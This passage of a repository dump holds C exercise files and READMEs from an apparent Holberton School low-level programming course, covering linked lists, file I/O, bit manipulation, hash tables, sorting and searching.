= 0;\n\n\twhile (*s != '\\0')\n\t{\n\t\tleng++;\n\t\ts++;\n\t}\n\treturn (leng);\n}\n" }, { "alpha_fraction": 0.5262500047683716, "alphanum_fraction": 0.5362499952316284, "avg_line_length": 18.047618865966797, "blob_id": "95c4ed64d75810fb68b2ca0a6ee33fc4567bb16b", "content_id": "1461b65164a117782a6d7a7ee175d3c6ba00dcce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 800, "license_type": "no_license", "max_line_length": 50, "num_lines": 42, "path": "/0x0E-structures_typedef/4-new_dog.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"dog.h\"\n#include <stdlib.h>\n/**\n * new_dog - creates a new struct dog.\n * @name: input name.\n * @age: input age.\n * @owner: input owner name.\n * Return: pointer to struct.\n */\ndog_t *new_dog(char *name, float age, char *owner)\n{\n\tstruct dog *nd;\n\tint i, j, len;\n\n\tfor (i = 0; name[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; owner[j] != '\\0'; j++)\n\t\t;\n\n\tnd = malloc(sizeof(struct dog));\n\tif (nd == NULL)\n\t\treturn (NULL);\n\tnd->name = malloc(sizeof(char) * (i + 1));\n\tif (nd->name == NULL)\n\t{\n\t\tfree(nd);\n\t\treturn (NULL);\n\t}\n\tfor (len = 0; len <= i; len++)\n\t\tnd->name[len] = name[len];\n\tnd->age = age;\n\tnd->owner = malloc(sizeof(char) * (j + 1));\n\tif (nd->owner == NULL)\n\t{\n\t\tfree(nd->name);\n\t\tfree(nd);\n\t\treturn (NULL);\n\t}\n\tfor (len = 0; len <= j; len++)\n\t\tnd->owner[len] = owner[len];\n\treturn (nd);\n}\n" }, { "alpha_fraction": 0.5797511339187622, "alphanum_fraction": 0.6306561231613159, "avg_line_length": 21.100000381469727, "blob_id": "eb5295aca16d0a29ef6deab01b9e96b4f581d188", "content_id": "b35cea123e9c0ad8e8cc2094984c10f275685d93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 77, "num_lines": 80, "path": "/0x15-file_io/3-cp.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * printerr_97 - function that print error and exit 97 when arguments != 3.\n */\nvoid printerr_97(void)\n{\n\tdprintf(STDERR_FILENO, \"Usage: cp file_from file_to\\n\");\n\texit(97);\n}\n\n/**\n * printerr_98 - function that print error and exit 98, if file_from does not\n * exist, or if you can not read it.\n * @file_from: first argument.\n */\nvoid printerr_98(char *file_from)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't read from file %s\\n\", file_from);\n\texit(98);\n}\n\n/**\n * printerr_99 - function that print error and exit 99, if file_to can't be\n * created or if write fails.\n * @file_to: second argument.\n */\nvoid printerr_99(char *file_to)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't write to %s\\n\", file_to);\n\texit(99);\n}\n\n/**\n * printerr_100 - function that print error and exit 100 if close fails\n * @fd: file descriptor value.\n */\nvoid printerr_100(int fd)\n{\n\tdprintf(STDERR_FILENO, \"Error: Can't close fd %d\\n\", fd);\n\texit(100);\n}\n\n/**\n * main - program that copies the content of a file to another file.\n * @ac: arguments count.\n * @av: arguments vector.\n * Return: Always 0 if correct.\n */\nint main(int ac, char **av)\n{\n\tchar *file_from = av[1];\n\tchar *file_to = av[2];\n\tchar buf[1024];\n\tint fd, fd2, letter_co;\n\tssize_t buf_sz = 1024;\n\n\tif (ac != 3)\n\t\tprinterr_97();\n\tfd = open(file_from, O_RDONLY);\n\tif (fd == -1)\n\t\tprinterr_98(file_from);\n\tfd2 = open(file_to, O_WRONLY | O_CREAT | O_TRUNC | O_APPEND, 0664);\n\tif (fd2 == -1)\n\t\tprinterr_99(file_to);\n\twhile (buf_sz == 1024)\n\t{\n\t\tbuf_sz = read(fd, buf, 1024);\n\t\tif (buf_sz == -1)\n\t\t\tprinterr_98(file_from);\n\t\tletter_co = write(fd2, buf, buf_sz);\n\t\tif (letter_co == -1)\n\t\t\tprinterr_99(file_to);\n\t}\n\tif (close(fd) == -1)\n\t\tprinterr_100(fd);\n\tif (close(fd2) == -1)\n\t\tprinterr_100(fd2);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5963060855865479, "alphanum_fraction": 0.6121371984481812, "avg_line_length": 18.947368621826172, "blob_id": "f146146adeed559090a34a2365a4fc8383de0cb9", "content_id": "d6a8bb79a65b29f19d5d15ccfc58799d228e9ba5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 379, "license_type": "no_license", "max_line_length": 59, "num_lines": 19, "path": "/0x14-bit_manipulation/3-set_bit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * set_bit - sets the value of a bit to 1 at a given index.\n * @n: address to the given number.\n * @index: binary index.\n * Return: 1 if worked.\n */\nint set_bit(unsigned long int *n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\t*n = (a << index | *n);\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.6051838397979736, "alphanum_fraction": 0.615431010723114, "avg_line_length": 20.269229888916016, "blob_id": "694df238fbf8e8b38684cabb721f66794cb827c9", "content_id": "0b0ef9fab2d32882aeb07cdee491024aa761126b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 73, "num_lines": 78, "path": "/0x13-more_singly_linked_lists/101-print_listint_safe.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * free_listpoint - frees a listpoin_t list.\n * @head: pointer to first node.\n */\nvoid free_listpoint(listpoin_t *head)\n{\n\tlistpoin_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n\n/**\n * add_nodepoint - adds a new node at the beginning of a listpoin_t list.\n * @head: pointer to first node.\n * @p: given address.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistpoin_t *add_nodepoint(listpoin_t **head, void *p)\n{\n\tlistpoin_t *temp2;\n\n\ttemp2 = malloc(sizeof(listpoin_t));\n\tif (temp2 == NULL)\n\t\texit(98);\n\ttemp2->p = p;\n\ttemp2->next = *head;\n\t*head = temp2;\n\treturn (temp2);\n}\n\n/**\n * print_listint_safe - prints a listint_t linked list.\n * @head: pointer to first node.\n * Return: number of nodes in the list\n */\nsize_t print_listint_safe(const listint_t *head)\n{\n\tint count = 0;\n\tconst listint_t *cursor = NULL;\n\tconst listint_t *temp = NULL;\n\tlistpoin_t *cursor2 = NULL;\n\tlistpoin_t *head_strp = NULL;\n\n\tif (head == NULL)\n\t\treturn (0);\n\tcursor = head;\n\tadd_nodepoint(&head_strp, (void *)cursor);\n\tfor (; cursor != NULL; cursor = cursor->next, count++)\n\t{\n\t\tif (cursor->next)\n\t\t\ttemp = cursor->next;\n\t\telse\n\t\t\ttemp = NULL;\n\t\tfor (cursor2 = head_strp; cursor2 != NULL; cursor2 = cursor2->next)\n\t\t{\n\t\t\tif (temp == cursor2->p)\n\t\t\t{\n\t\t\t\tprintf(\"[%p] %d\\n\", (void *)cursor, cursor->n);\n\t\t\t\tprintf(\"-> [%p] %d\\n\", (void *)temp, temp->n);\n\t\t\t\tcount++;\n\t\t\t\tfree_listpoint(head_strp);\n\t\t\t\treturn (count);\n\t\t\t}\n\t\t}\n\t\tadd_nodepoint(&head_strp, (void *)temp);\n\t\tprintf(\"[%p] %d\\n\", (void *)cursor, cursor->n);\n\t}\n\tfree_listpoint(head_strp);\n\treturn (count);\n}\n" }, { "alpha_fraction": 0.8186046481132507, "alphanum_fraction": 0.8186046481132507, "avg_line_length": 42.20000076293945, "blob_id": "ac2583e14ba20a7e45bc9f34dd7cee5de2944187", "content_id": "66a9c359d84e69d80ceb19e74af6dfa2d071f98a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 215, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/0x0C-more_malloc_free/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about malloc and free, different projects to practice this functions.\n\nGeneral\nHow to use the exit function\nWhat are the functions calloc and realloc from the standard library and how to use them." }, { "alpha_fraction": 0.7156374454498291, "alphanum_fraction": 0.7330677509307861, "avg_line_length": 50.487178802490234, "blob_id": "01c545db6e0068cb3f313405fc426a734a4c0dc4", "content_id": "f2c7e4da18356b1ab040e1494b54ba0e1a15b4b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2008, "license_type": "no_license", "max_line_length": 129, "num_lines": 39, "path": "/0x1E-search_algorithms/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Search Algorithms\n\n## General Learning Objectives:\n\n- What is a search algorithm\n- What is a linear search\n- What is a binary search\n- What is the best search algorithm to use depending on your needs\n\n## Files:\n- 0-linear.c - function that searches for a value in an array of integers using the Linear search algorithm\n- 1-binary.c - function that searches for a value in a sorted array of integers using the Binary search algorithm\n- 2-O - time complexity (worst case) of a linear search in an array of size n\n- 3-O - space complexity (worst case) of an iterative linear search algorithm in an array of size n\n- 4-O - time complexity (worst case) of a binary search in an array of size n\n- 5-O - space complexity (worst case) of a binary search in an array of size n\n- 6-O - space complexity of this function:\n```\nint **allocate_map(int n, int m)\n{\n\tint **map;\n\n\tmap = malloc(sizeof(int *) * n);\n\tfor (size_t i = 0; i < n; i++)\n\t{\n\t\tmap[i] = malloc(sizeof(int) * m);\n\t}\n\treturn (map);\n}\n```\n- 100-jump.c - function that searches for a value in a sorted array of integers using the Jump search algorithm\n- 101-O - time complexity (average case) of a jump search in an array of size n, using step = sqrt(n)\n- 102-interpolation.c - function that searches for a value in a sorted array of integers using the Interpolation search algorithm\n- 103-exponential.c - function that searches for a value in a sorted array of integers using the Exponential search algorithm\n- 104-advanced_binary.c - function that searches for a value in a sorted array of integers.\n- 105-jump_list.c - function that searches for a value in a sorted list of integers using the Jump search algorithm.\n- 106-linear_skip.c - function that searches for a value in a sorted skip list of integers.\n- 107-O - time complexity (average case) of a jump search in a singly linked list of size n, using step = sqrt(n)\n- 108-O - time complexity (average case) of a jump search in a skip list of size n, with an express lane using step = sqrt(n)\n" }, { "alpha_fraction": 0.8194444179534912, "alphanum_fraction": 0.8194444179534912, "avg_line_length": 26, "blob_id": "af98cc360813e67c60aeb1365a3e939620c899db", "content_id": "1feffd0220c962df9a814c3c055a7967d5c4aeb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 216, "license_type": "no_license", "max_line_length": 62, "num_lines": 8, "path": "/0x14-bit_manipulation/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### BIT MANIPULATION\n\nThis repository is about Bit manipulation learning\n\nGeneral Learning Objectives:\n\nLook for the right source of information without too much help\nHow to manipulate bits and use bitwise operators\n" }, { "alpha_fraction": 0.6072041392326355, "alphanum_fraction": 0.6140651702880859, "avg_line_length": 20.592592239379883, "blob_id": "fb4331d13cee7349898df86f04a3ab2202ca9124", "content_id": "53f643a990652519c969f044750eace37fef8673", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 583, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/0x17-doubly_linked_lists/5-get_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * get_dnodeint_at_index - get the given node index in a dlistin_t list.\n * @head: pointer to first node.\n * @index: node index looked.\n * Return: returns the nth node of a listint_t linked list.\n */\ndlistint_t *get_dnodeint_at_index(dlistint_t *head, unsigned int index)\n{\n\tunsigned int i;\n\tdlistint_t *cursor = NULL;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tcursor = head;\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (index == 0)\n\t\t\treturn (cursor);\n\t\tcursor = cursor->next;\n\t\tif (i == (index - 1) && index != 0)\n\t\t{\n\t\t\treturn (cursor);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.4477498233318329, "alphanum_fraction": 0.4637681245803833, "avg_line_length": 16.958904266357422, "blob_id": "b13794bde8a5c7cbd9e16de0bf510c3adfb687e8", "content_id": "b7f0d2caf6cbd00a7a1e40f743e63f01aea2bb95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 64, "num_lines": 73, "path": "/0x0B-malloc_free/100-strtow.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * cwords - count number of words in a given string.\n * @str: given string.\n * @l: lenght of string.\n * Return: number of words.\n */\nint cwords(char *str, int l)\n{\n\tint i, count_w = 0;\n\n\tfor (i = 0; i < l; i++)\n\t{\n\t\tif (str[i] != ' ')\n\t\t{\n\t\t\tfor (; str[i] != ' '; i++)\n\t\t\t\t;\n\t\t\tcount_w++;\n\t\t}\n\t}\n\treturn (count_w);\n}\n\n/**\n * strtow - splits a string into words.\n * @str: input string.\n * Return: Pointer to array.\n */\nchar **strtow(char *str)\n{\n\tchar **p;\n\tint count_w = 0, count_c = 0, i, leng, x = 0, fr, j = 0, z = 0;\n\n\tif (str == NULL || *str == '\\0')\n\t{\n\t\treturn (NULL);\n\t}\n\tfor (leng = 0; str[leng] != '\\0'; leng++)\n\t\t;\n\tcount_w = cwords(str, leng);\n\tp = (char **)malloc((count_w + 1) * sizeof(char *));\n\tif (p == NULL || count_w == 0)\n\t{\n\t\tfree(p);\n\t\treturn (NULL);\n\t}\n\tfor (i = 0; i < leng; i++)\n\t{\n\t\tif (str[i] != ' ')\n\t\t{z = 1;\n\t\t\tfor (count_c = 0; str[i] != ' ' && str[i] != '\\0'; i++)\n\t\t\t\tcount_c++;\n\t\t\tp[x] = (char *)malloc((count_c + 1) * sizeof(char));\n\t\t\tif (p[x] == NULL)\n\t\t\t{\n\t\t\t\tfor (fr = 0; fr <= x; fr++)\n\t\t\t\t\tfree(p[fr]);\n\t\t\t\tfree(p);\n\t\t\t\treturn (NULL);\n\t\t\t}\n\t\t\tfor (j = 0; j < count_c; j++)\n\t\t\t\tp[x][j] = str[(i - count_c) + j];\n\t\t\tp[x][j] = '\\0';\n\t\t\tx++;\n\t\t}\n\t}\n\tif (z != 1)\n\t\treturn (NULL);\n\tp[x] = NULL;\n\treturn (p);\n}\n" }, { "alpha_fraction": 0.48910412192344666, "alphanum_fraction": 0.5157384872436523, "avg_line_length": 11.90625, "blob_id": "045bfad0f7610b8529c30bf7693c4ad9f2d67935", "content_id": "c0cfe884776a52960a54bd7a079664bc1291dda8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 413, "license_type": "no_license", "max_line_length": 55, "num_lines": 32, "path": "/0x02-functions_nested_loops/103-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter, itnum, sum;\n\tlong int next;\n\n\titnum = 29;\n\tin = 1;\n\tln = 2;\n\tsum = 0;\n\n\tfor (iter = 0; iter <= itnum; iter++)\n\t{\n\t\tnext = in + ln;\n\t\tin = ln;\n\t\tln = next;\n\t\tif (next % 2 == 0)\n\t\t{\n\t\t\tsum = sum + next;\n\t\t}\n\t}\n\tsum = sum + 2;\n\tprintf(\"%ld\\n\", sum);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.6487985253334045, "alphanum_fraction": 0.6506469249725342, "avg_line_length": 21.54166603088379, "blob_id": "ff190e0a222e955aef130715eafbf0719d9f4272", "content_id": "c3759f02c9e74308476dd0c5bd6c69f09ddb04c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 541, "license_type": "no_license", "max_line_length": 74, "num_lines": 24, "path": "/0x1A-hash_tables/0-hash_table_create.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_create - function that creates a hash table.\n * @size: size of the array.\n * Return: pointer to the newly created hash table or NULL if something go\n * wrong\n */\n\nhash_table_t *hash_table_create(unsigned long int size)\n{\n\thash_table_t *new_ht;\n\n\tif (size == 0)\n\t\treturn (NULL);\n\tnew_ht = malloc(sizeof(hash_table_t));\n\tif (new_ht == NULL)\n\t\treturn (NULL);\n\tnew_ht->size = size;\n\tnew_ht->array = calloc(size, sizeof(hash_node_t *));\n\tif (new_ht->array == NULL)\n\t\treturn (NULL);\n\treturn (new_ht);\n}\n" }, { "alpha_fraction": 0.5947046875953674, "alphanum_fraction": 0.5987780094146729, "avg_line_length": 20.34782600402832, "blob_id": "e91cafa5eee6c249c91aa942175926d8520bb7eb", "content_id": "2e1896fe54d52aa64a66e4fd7b4c64119f21f006", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/0x12-singly_linked_lists/2-add_node.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * add_node - adds a new node at the beginning of a list_t list.\n * @head: pointer to firtst node.\n * @str: given string.\n * Return: the address of the new element, or NULL if it failed.\n */\nlist_t *add_node(list_t **head, const char *str)\n{\n\tlist_t *temp;\n\tint i;\n\n\ttemp = malloc(sizeof(list_t));\n\tif (temp == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; str[i] != '\\0'; i++)\n\t\t;\n\ttemp->len = i;\n\ttemp->str = strdup(str);\n\ttemp->next = *head;\n\t*head = temp;\n\treturn (temp);\n}\n" }, { "alpha_fraction": 0.5856621861457825, "alphanum_fraction": 0.5953827500343323, "avg_line_length": 20.102563858032227, "blob_id": "6869153d0ba0f6d59d253568bb3e0cc9b3f989ab", "content_id": "8cbc1742cbf78df182c0e6ac643f2cf5c4c3285a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 823, "license_type": "no_license", "max_line_length": 72, "num_lines": 39, "path": "/0x13-more_singly_linked_lists/10-delete_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * delete_nodeint_at_index - deletes the node at index of a linked list.\n * @head: pointer to first node.\n * @index: given node index.\n * Return: return the address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\nint delete_nodeint_at_index(listint_t **head, unsigned int index)\n{\n\tlistint_t *temp;\n\tlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (-1);\n\tcursor = *head;\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (i == (index - 1) && index != 0)\n\t\t{\n\t\t\ttemp = cursor->next;\n\t\t\tcursor->next = temp->next;\n\t\t\ttemp->next = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\telse if (index == 0)\n\t\t{\n\t\t\ttemp = *head;\n\t\t\t*head = temp->next;\n\t\t\ttemp->next = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\tcursor = cursor->next;\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.49438202381134033, "alphanum_fraction": 0.5248796343803406, "avg_line_length": 17.323530197143555, "blob_id": "7b9cae01ba5204d6c5b7e8ed3b616c73b8128868", "content_id": "ef9cd685b4c101d1dae8b850c3b6ded44155bd39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 623, "license_type": "no_license", "max_line_length": 74, "num_lines": 34, "path": "/0x14-bit_manipulation/0-binary_to_uint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * binary_to_uint - converts a binary number to an unsigned int.\n * @b: pointer to a string of 0 and 1 chars\n * Return: the converted number, or 0 if there is one or more chars in the\n * string b that is not 0 or 1, b is NULL.\n */\nunsigned int binary_to_uint(const char *b)\n{\n\tint i, len, e;\n\tunsigned int res = 0;\n\n\tif (b == NULL)\n\t\treturn (0);\n\n\te = 1;\n\n\tfor (len = 0; b[len] != '\\0'; len++)\n\t{\n\t\tif (b[len] != '1' && b[len] != '0')\n\t\t\treturn (0);\n\t}\n\n\tfor (i = (len - 1); i >= 0; i--)\n\t{\n\t\tif (i == (len - 1))\n\t\t\te = 1;\n\t\telse\n\t\t\te *= 2;\n\t\tres = res + ((b[i] - '0') * e);\n\t}\n\treturn (res);\n}\n" }, { "alpha_fraction": 0.6164705753326416, "alphanum_fraction": 0.6235294342041016, "avg_line_length": 19.238094329833984, "blob_id": "afe732d391da3b82a90933131d16121fc00c5cc5", "content_id": "b3a9a9b5ab383ad03ff67f30b96f4556d65f75d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 425, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/0x0F-function_pointers/1-array_iterator.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stddef.h>\n#include <stdlib.h>\n/**\n * array_iterator - executes a function given as a parameter on each\n * element of an array.\n * @array: given array.\n * @size: size of the array.\n * @action: pointer to the function needed.\n */\nvoid array_iterator(int *array, size_t size, void (*action)(int))\n{\n\tsize_t i;\n\n\tif (array == NULL || action == NULL)\n\t\texit(98);\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\taction(array[i]);\n\t}\n}\n" }, { "alpha_fraction": 0.4658385217189789, "alphanum_fraction": 0.4989648163318634, "avg_line_length": 11.384614944458008, "blob_id": "6cebb5461edac351e20d429089622ac32ce46e19", "content_id": "aada3a8a499a5756c7ba788915d83b11a2468087", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 483, "license_type": "no_license", "max_line_length": 39, "num_lines": 39, "path": "/0x06-pointers_arrays_strings/100-print_number.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_number - print an int numbers.\n * @n: number tested\n * Return: Always 0.\n */\nvoid print_number(int n)\n{\n\tint dig = 0, tend = 1, iter = 1;\n\tunsigned int abs = n, numch, num;\n\n\tif (n < 0)\n\t{\n\t\t_putchar('-');\n\t\tabs = -n;\n\t}\n\telse\n\t{\n\t\tabs = n;\n\t}\n\tnum = abs;\n\n\twhile (num > 0)\n\t{\n\t\tnum /= 10;\n\t\tdig++;\n\t}\n\twhile (iter < dig)\n\t{\n\t\ttend *= 10;\n\t\titer++;\n\t}\n\twhile (tend >= 1)\n\t{\n\t\tnumch = (abs / tend) % 10;\n\t\t_putchar(numch + '0');\n\t\ttend /= 10;\n\t}\n}\n" }, { "alpha_fraction": 0.5212628841400146, "alphanum_fraction": 0.5393041372299194, "avg_line_length": 16.636363983154297, "blob_id": "9372bcd37181763ee21c8d02f52d794979d16e82", "content_id": "bc8ed40b41fdbfb24328a7fd17a5ec72b13bee4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 71, "num_lines": 88, "path": "/0x1B-sorting_algorithms/105-radix_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * cifra - function that return the value of the less significant digit\n * depending of var.\n * @var: LSD 1, 2, 3..etc\n * @value: value in the array\n * Return: the digit in the var position\n */\nint cifra(int value, int var)\n{\n\tint i;\n\n\tfor (i = 0; i < var - 1; i++)\n\t{\n\t\tvalue = value / 10;\n\t}\n\tvalue = value % 10;\n\treturn (value);\n}\n/**\n * radix_function - sort the array using a copy\n * @array: array to sort\n * @copy: copy of array\n * @var: LSD, position of digit\n * @size: size of array\n */\nvoid radix_function(int *array, int var, int size, int *copy)\n{\n\tint min = 10, i, k = 0, valor = 0, j;\n\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tvalor = cifra(array[i], var);\n\t\tif (valor < min)\n\t\t\tmin = valor;\n\t}\n\n\tfor (i = min; i < 10; i++)\n\t{\n\t\tfor (j = 0; j < (int)size && k < (int)size; j++)\n\t\t{\n\t\t\tvalor = cifra(array[j], var);\n\t\t\tif (valor == i)\n\t\t\t{\n\t\t\t\tcopy[k] = array[j];\n\t\t\t\tk++;\n\t\t\t}\n\t\t}\n\t}\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tarray[i] = copy[i];\n\t}\n\tprint_array(array, size);\n}\n/**\n * radix_sort - sort an array using radix algorithm\n * @array: array to sort\n * @size: size of array\n */\nvoid radix_sort(int *array, size_t size)\n{\n\tint max = 0, i, *copy, num = 1, var = 1;\n\n\tif (!array || size == 1)\n\t\treturn;\n\n\tcopy = malloc(sizeof(int) * (size - 1));\n\tif (!copy)\n\t\treturn;\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tcopy[i] = array[i];\n\n\t\tif (array[i] > max)\n\t\t\tmax = array[i];\n\t}\n\twhile (max > 9)\n\t{\n\t\tmax = max / 10;\n\t\tnum++;\n\t}\n\tfor (i = 0; i < num; i++, var++)\n\t{\n\t\tradix_function(array, var, size, copy);\n\t}\n\tfree(copy);\n}\n" }, { "alpha_fraction": 0.5946969985961914, "alphanum_fraction": 0.5946969985961914, "avg_line_length": 13.666666984558105, "blob_id": "233ce66263f092e1b9ce31dae6675888a021faea", "content_id": "51e5e6739ba299dc20ae76540a1973a15548d562", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 264, "license_type": "no_license", "max_line_length": 35, "num_lines": 18, "path": "/0x12-singly_linked_lists/4-free_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_list - frees a list_t list.\n * @head: pointer to firtst node.\n */\nvoid free_list(list_t *head)\n{\n\tlist_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor->str);\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n" }, { "alpha_fraction": 0.5749129056930542, "alphanum_fraction": 0.592334508895874, "avg_line_length": 15.882352828979492, "blob_id": "358538f461ff52c050a225a329e484fd249360cf", "content_id": "4e1d729cb3703a13b556e25a1e1de230cf9f31ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 287, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/0x02-functions_nested_loops/7-print_last_digit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_last_digit - return the last digit of a number\n * @n: variable for input value and recursive when last digit.\n * Return: the las digit.\n */\n\nint print_last_digit(int n)\n{\n\tn = n % 10;\n\tif (n < 0)\n\t{\n\t\tn = n * -1;\n\t}\n\t_putchar('0' + n);\n\treturn (n);\n}\n" }, { "alpha_fraction": 0.5850144028663635, "alphanum_fraction": 0.5926993489265442, "avg_line_length": 14.772727012634277, "blob_id": "c0a91e35004998a4c351f5eaa30ccacd486793bb", "content_id": "fc6bc7400e0b6d58fa1d5c8c5d61b4cb2184bdd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 47, "num_lines": 66, "path": "/0x0F-function_pointers/3-op_functions.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <stdio.h>\n/**\n * op_add - function that add two integrers.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of adding both integrers.\n */\nint op_add(int a, int b)\n{\n\treturn (a + b);\n}\n\n/**\n * op_sub - function that substract.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of substraction.\n */\nint op_sub(int a, int b)\n{\n\treturn (a - b);\n}\n\n/**\n * op_mul - function that multiply.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of multiplication.\n */\nint op_mul(int a, int b)\n{\n\treturn (a * b);\n}\n\n/**\n * op_div - function that divide two integrers.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of divition.\n */\nint op_div(int a, int b)\n{\n\tif (b == 0)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(100);\n\t}\n\treturn (a / b);\n}\n\n/**\n * op_mod - function that calcs the module.\n * @a: first integrer.\n * @b: second integrer.\n * Return: the module number.\n */\nint op_mod(int a, int b)\n{\n\tif (b == 0)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(100);\n\t}\n\treturn (a % b);\n}\n" }, { "alpha_fraction": 0.7758620977401733, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 57, "blob_id": "b6d51103d94b50011d5f1e23d20825c1f62db5ab", "content_id": "c382f9ce0c4bc71c0a1195597decde9905e0e514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 174, "license_type": "no_license", "max_line_length": 128, "num_lines": 3, "path": "/0x18-dynamic_libraries/101-make_me_win.sh", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": 